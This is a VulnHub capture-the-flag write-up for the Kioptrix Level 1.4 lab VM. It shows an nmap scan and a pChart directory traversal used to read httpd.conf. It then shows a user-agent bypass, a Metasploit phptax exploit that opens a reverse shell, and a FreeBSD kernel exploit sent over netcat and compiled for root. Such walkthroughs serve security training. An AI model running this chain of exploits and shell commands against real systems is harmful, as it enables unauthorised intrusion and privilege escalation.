VulnHub Writeup : Kioptrix Levle 1.4 (#5)

Box Stats :

Box InformationDetails
Box NameKioptrix Level 1.4
Series Kioptrix
Release Date6 Apr 2014
Download LinkLink

Network Scan

The IP of target vm is, Perform nmap scan on targat

$ nmap -sV --top-ports 1000 -oN nmap.txt                                                                                              

Starting Nmap 7.91 ( ) at 2021-10-26 16:38 EDT
Nmap scan report for
Host is up (0.00050s latency).
Not shown: 997 filtered ports
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 30.54 seconds

As we can see port 80 and 8080 are open. Checking port 80 web server, it only had It works! message, but in page source there is commented part which points to pchart link

Now open there is an pchart application hosted on port 80

Now google search shows that pChart 2.1.3 has XSS and Directory traversal vulnerability, where directory traversal vulnerability can be exploited by accessing below link

at this point can not do much with this vulnerability, now lets check port 8080.

It says access forbidden. But we can access the apache server httpd.conf file because of directory traversal vulnerability. And we also know that the os is FreeBsd then the location of httpd.conf file would be /usr/local/etc/apache2x/httpd.conf, now lets try to access it.

The above picture shows the last lines of httpd.conf file which indicates that the browser user agent has been checked by the web server and if user agent is Mozilla/4.0 then only it can access the application running on port 8080.

So we have to change the browser user agent to mozilla/4.0, and for that we are going to install User agent switcher plugin into firefox browser and then try to access the service running on port 8080

Add Mozilla/4.0 (compatible; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8) to Kioptrix5

Now enable the custom user agent then access


the phptax app is hosted on, a google search on phptax has Remote code execution vulnerability, and there also a metasploit module available to for phptax rce vulnerability, so we are going to use metasploit.

msf6 > use exploit/multi/http/phptax_exec
msf6 exploit(multi/http/phptax_exec) > set RHOSTS
msf6 exploit(multi/http/phptax_exec) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/phptax_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(multi/http/phptax_exec) > set lhost
lhost =>
msf6 exploit(multi/http/phptax_exec) > exploit

[*] Started reverse TCP double handler on
[*] - Sending request...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo y6th2VULrYqot44x;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Command: echo jVPGdJKnv4d3Y4jP;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "Connected: not found\r\nEscape: not found\r\njVPGdJKnv4d3Y4jP\r\n"
[*] Reading from socket B
[*] B: "y6th2VULrYqot44x\r\n"
[*] Matching...
[*] A is input...
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened ( -> at 2021-10-27 16:06:00 -0400

[*] Command shell session 2 opened ( -> at 2021-10-27 16:06:00 -0400
uid=80(www) gid=80(www) groups=80(www)
uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012  amd64

Now for privilege escalation, there is a kernel exploit available for FreeBSD 9.0 at exploitdb. Now first download the exploit into attacker machine, then we have to upload/send the exploit code into target machine and compile it and run it on target.

We are going to use nc to send the exploit into target machine

wget -O exploit.c
nc -lvvp 8888 < exploit.c 

the nc listener is listening on port 8888. To download it into target machine, just connect to the attacker machine by

nc 8888 > exploit.c

It may takes few seconds to download, then compile and run the exploit

gcc exploit.c -o exploit
exploit.c:89:2: warning: no newline at end of file
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)

And as we can see we have root access to the machine..

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.